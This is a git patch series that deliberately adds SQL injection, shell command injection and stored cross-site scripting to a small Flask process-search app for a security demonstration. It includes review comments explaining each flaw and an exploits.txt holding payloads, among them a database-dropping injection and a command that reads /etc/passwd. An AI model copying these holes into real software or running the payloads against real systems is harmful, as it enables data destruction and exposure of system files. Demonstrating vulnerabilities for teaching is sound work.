From a46d2b076a7c730c0690248ecf1a6de4d4831f2a Mon Sep 17 00:00:00 2001
From: Dean Johnson
Date: Mon, 24 Feb 2014 13:19:05 -0800
Subject: [PATCH 1/4] Added SQL Injection vulnerability.

---
 systemview.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/systemview.py b/systemview.py
index 4188c12..a32bf41 100644
--- a/systemview.py
+++ b/systemview.py
@@ -111,7 +111,9 @@ def show_procs(term=None):
 count += 1
 # check to see if the term is already in the db
- search = Search.query.filter_by(term=term).first()
+
+ search = db.session.execute("select * from searches where term=\"" + term + "\"").fetchall()
+ print search
 # check to see that we entered a term, and it's not in the db
 if term and not search:

From 9beb7de227e510e9d7a29cd91cb39a275a40731b Mon Sep 17 00:00:00 2001
From: Dean Johnson
Date: Mon, 24 Feb 2014 13:30:09 -0800
Subject: [PATCH 2/4] Added RCE.

---
 systemview.py | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/systemview.py b/systemview.py
index a32bf41..c2e663d 100644
--- a/systemview.py
+++ b/systemview.py
@@ -98,7 +98,8 @@ def show_procs(term=None):
 term = request.form['term']
 # now lets get all the system processes
- raw_procs = subprocess.Popen(['ps', 'auxh'],
+ cmd = "ps aux | grep " + term
+ raw_procs = subprocess.Popen(cmd, shell=True,
 stdout=subprocess.PIPE).communicate()[0]
 # now filter the raw process list to find lines with our term
@@ -111,9 +112,7 @@ def show_procs(term=None):
 count += 1
 # check to see if the term is already in the db
- search = db.session.execute("select * from searches where term=\"" + term + "\"").fetchall()
- print search
 # check to see that we entered a term, and it's not in the db
 if term and not search:

From c78e9cef40d2d61740767a24eb125028f45f19b0 Mon Sep 17 00:00:00 2001
From: Dean Johnson
Date: Mon, 24 Feb 2014 15:14:03 -0800
Subject: [PATCH 3/4] Added XSS Vulnerability.

---
 templates/proc_search.html | 2 ++
 1 file changed, 2 insertions(+)

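Review bot: The added `db.session.execute(...)` line splices `term` into the SQL text between literal double quotes, and the next patch's hunk shows `term` is `request.form['term']`, so a value containing `"` rewrites the statement — the behaviour this demo commit sets out to show, but it must not reach a deployed branch. If the line is to stay as a teaching example, tag it `# INTENTIONALLY VULNERABLE: SQL injection demo — do not deploy`; otherwise bind the value, `search = db.session.execute("select * from searches where term = :term", {"term": term}).fetchall()`, which keeps the `fetchall()` list that the `if term and not search:` context line tests. The added `print search` writes every matching row to the server's stdout on each request and reads as leftover debugging. Separately, double-quoted string literals are a SQLite/MySQL convenience — on PostgreSQL `"..."` names an identifier — so the new query is backend-specific as well. show_procs starts and ends outside this hunk.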
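Review bot: `cmd = "ps aux | grep " + term` runs through `shell=True`, and the context line at the top of the hunk shows `term` is `request.form['term']`, so any shell metacharacter in the form field executes as the web server's user (`exploits.txt` in patch 4 does exactly that). If this stays as the demo the title describes, tag it `# INTENTIONALLY VULNERABLE: command injection demo — never deploy`; otherwise there is no need for a shell at all, since the last context line says the raw listing is filtered for the term in Python below, so `raw_procs = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE).communicate()[0]` is sufficient and keeps `term` out of any command line. Note too that the concatenation raises `TypeError` if `term` is still the `None` default from the signature when line 98 is not reached (the condition around that assignment is outside the hunk), whereas the old argv form did not touch `term` here. show_procs continues outside the hunk on both sides.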
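Review bot: This hunk removes the only assignment to `search` visible in show_procs, yet the context line `if term and not search:` still reads it, so unless `search` is bound earlier in the function (outside both hunks of this patch) every request now ends in `NameError`, and the "not in the db" check is lost regardless. Dropping the injectable query is the right direction, but it needs a replacement lookup, e.g. `search = db.session.execute("select * from searches where term = :term", {"term": term}).fetchall()`, or the `if` must change along with it. The function continues outside the hunk on both sides.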
diff --git a/templates/proc_search.html b/templates/proc_search.html
index 4dae6ce..dca0e0d 100644
--- a/templates/proc_search.html
+++ b/templates/proc_search.html
@@ -48,9 +48,11 @@

{{ count }} processes found on {{ hostname }}

Previous searches:

    + {% autoescape false %} {% for search in searches %}
  • {% endfor %} + {% endautoescape %}
{% else %}

From d2c41fc533c6fa06cd7901b5bb7800257f306ff3 Mon Sep 17 00:00:00 2001
From: Dean Johnson
Date: Thu, 6 Mar 2014 18:04:21 -0800
Subject: [PATCH 4/4] Added file with exploits used in the demonstration.

---
 exploits.txt | 3 +++
 1 file changed, 3 insertions(+)
 create mode 100644 exploits.txt

diff --git a/exploits.txt b/exploits.txt
new file mode 100644
index 0000000..3ab0511
--- /dev/null
+++ b/exploits.txt
@@ -0,0 +1,3 @@
+SQL Injection: ";drop database systemview;
+RCE: nonesense; cat /etc/passwd > test
+XSS: ";
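Review bot: Everything rendered between the added `{% autoescape false %}` and `{% endautoescape %}` now reaches the page without HTML escaping; the list-item body is not visible in this rendering of the hunk, but "Previous searches:" and the `searches` loop variable indicate it prints terms previously submitted through the form, so a stored term containing `<script>` would be emitted verbatim into every later visitor's page (stored XSS, which patch 4's `exploits.txt` lists — its payload appears truncated in this rendering). Flask enables autoescaping for `.html` templates by default (this looks like a Flask app, given `request.form` and `db.session` in the earlier hunks), so the two added lines should be dropped rather than kept — or, if the demo needs them, annotated `{# INTENTIONALLY VULNERABLE: stored XSS demo — do not deploy #}` so they are not mistaken for a markup feature. If one value genuinely carries trusted markup, mark only that value `|safe` instead of disabling escaping for the whole block. The enclosing `{% if %}`/`{% else %}` block begins before this hunk.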